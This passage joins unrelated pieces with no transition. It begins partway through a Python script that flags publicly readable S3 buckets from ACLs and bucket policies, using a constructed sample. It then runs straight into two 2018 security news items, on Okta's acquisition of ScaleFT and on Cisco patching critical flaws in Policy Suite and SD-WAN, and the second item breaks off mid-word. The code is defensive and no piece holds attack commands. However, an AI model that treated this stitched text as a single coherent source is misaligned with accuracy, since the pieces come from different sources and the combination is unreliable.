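        if grantee.get("Type") == "Group" and uri in PUBLIC_GRANTEE_URIS:
            findings.append(f"ACL grants {grant.get('Permission')} to {PUBLIC_GRANTEE_URIS[uri]}")
    return findings

def _is_wildcard_principal(principal):
    # Principal "*" and {"AWS": "*"} (or a list containing "*") both mean "everyone".
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        return "*" in ([aws] if isinstance(aws, str) else aws)
    return False

def public_policy_statements(policy_json):
    """Findings for bucket-policy statements that Allow a wildcard principal with no Condition."""
    findings = []
    statements = json.loads(policy_json).get("Statement", [])
    statements = [statements] if isinstance(statements, dict) else statements
    for stmt in statements:
        if stmt.get("Effect") != "Allow" or not _is_wildcard_principal(stmt.get("Principal")):
            continue
        if stmt.get("Condition"):
            continue  # conditioned wildcard grants (source IP, VPC) need human review, not a blanket flag
        actions = stmt.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        findings.append(f"policy statement {stmt.get('Sid', '<no Sid>')} allows {', '.join(actions)} to everyone")
    return findings

def bucket_exposure(acl, policy_json=None):
    """All findings for one bucket; an empty list means no unconditional public access was found."""
    return public_acl_grants(acl) + (public_policy_statements(policy_json) if policy_json else [])

# Constructed sample (not RoboCent's real configuration): public-read ACL plus a public GetObject policy.
SAMPLE_ACL = [
    {"Grantee": {"Type": "CanonicalUser", "ID": "EXAMPLE-OWNER-ID"}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"}, "Permission": "READ"},
]
SAMPLE_POLICY = json.dumps({"Version": "2012-10-17", "Statement": [{"Sid": "PublicRead", "Effect": "Allow",
    "Principal": "*", "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-voter-data/*"}]})
```

Against a live account the same functions can be fed the output of boto3's get_bucket_acl() and get_bucket_policy(); S3 Block Public Access, where enabled, overrides both settings and should be checked first.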


Okta Acquires Access Control Startup ScaleFT
19.7.2018 securityweek  IT   

Enterprise identity management firm Okta this week announced that it has acquired ScaleFT, a company that offers a Zero Trust access control platform.

Okta provides a Single Sign-On (SSO) solution that helps customers efficiently manage user accounts across the enterprise and eliminate passwords while simplifying access. With Multi-factor Authentication (MFA), it provides strong authentication for various services, with over 5,500 pre-built integrations to applications and infrastructure providers.


Founded in 2015, ScaleFT’s access management platform was inspired by Google’s BeyondCorp security model, which provides remote access without the use of a VPN (virtual private network).

With this acquisition, publicly traded Okta (NASDAQ:OKTA), which already helps over 4,700 organizations both secure and manage their extended enterprise, plans to bring Zero Trust to corporations with a framework to protect sensitive data without compromising on experience.

By combining ScaleFT’s Zero Trust platform with its own Identity Cloud, Okta aims to help organizations easily validate user, device, application and network information while also securing access to data from cloud to ground.

“Companies have realized they can no longer trust their network and have to understand device security — instead of trusting everyone behind a firewall, now IT and security leaders must trust no one, inside or outside the organization,” Frederic Kerrest, Chief Operating Officer and co-founder, Okta, said.

“To help our customers increase security while also meeting the demands of the modern workforce, we’re acquiring ScaleFT to further our contextual access management vision — and ensure the right people get access to the right resources for the shortest amount of time,” Kerrest continued.

The Zero Trust security paradigm requires organizations to move away from the traditional approach of perimeter-based security that included static credentials and access controls, and to focus on adaptive and context-aware controls instead, for making continuous access decisions.

Following the acquisition, ScaleFT CEO and co-founder Jason Luce will manage the transition, while CTO and co-founder Paul Querna will lead strategy and execution of Okta's Zero Trust architecture. Marc Rogers, CSO, will join Okta as Executive Director, Cybersecurity Strategy.


Cisco Finds Serious Flaws in Policy Suite, SD-WAN Products
19.7.2018 securityweek Vulnerability

Cisco informed customers on Wednesday that it has found and patched over a dozen critical and high severity vulnerabilities in its Policy Suite, SD-WAN, WebEx and Nexus products.

The networking giant reported discovering four critical flaws in Policy Suite during internal testing. Two of these security holes are unauthenticated access issues that allow a remote attacker to access the Policy Builder interface and the Open Systems Gateway initiative (OSGi) interface.

Once they gain access to the Policy Builder interface, which is exposed due to a lack of authentication, attackers can make changes to existing repositories and create new repositories. The OSGi interface allows an attacker to access or change any file accessible by the OSGi process.

The lack of an authentication mechanism also exposes the Policy Builder database, allowing an attacker to access and change any data stored in it.

Cisco also discovered that the Cluster Manager in Policy Suite has a root account with default and static credentials. A remote attacker can log in to this account and execute arbitrary commands with root privileges.

These critical Policy Suite vulnerabilities are tracked as CVE-2018-0374, CVE-2018-0375, CVE-2018-0376 and CVE-2018-0377.

Cisco has also fixed a total of seven flaws in its SD-WAN solution. The only one of these vulnerabilities that can be exploited remotely without authentication impacts the Zero Touch Provisioning service and it allows an attacker to cause a denial-of-service (DoS) condition.

The other SD-WAN security holes, which require authentication, can be exploited to overwrite arbitrary files on the underlying operating system, and execute arbitrary commands with vmanage or root privileges. One of the SD-WAN bugs requires both authentication and local access for exploitation.

Cisco also informed customers that its Nexus 9000 series Fabric switches, specifically their DHCPv6 feature, are impacted by a high severity flaw that can be exploited by a remote and unauthenticated attacker to cause a DoS condition.

The company has also assigned a high severity rating to multiple vulnerabilities affecting the Cisco Webex Network Recordin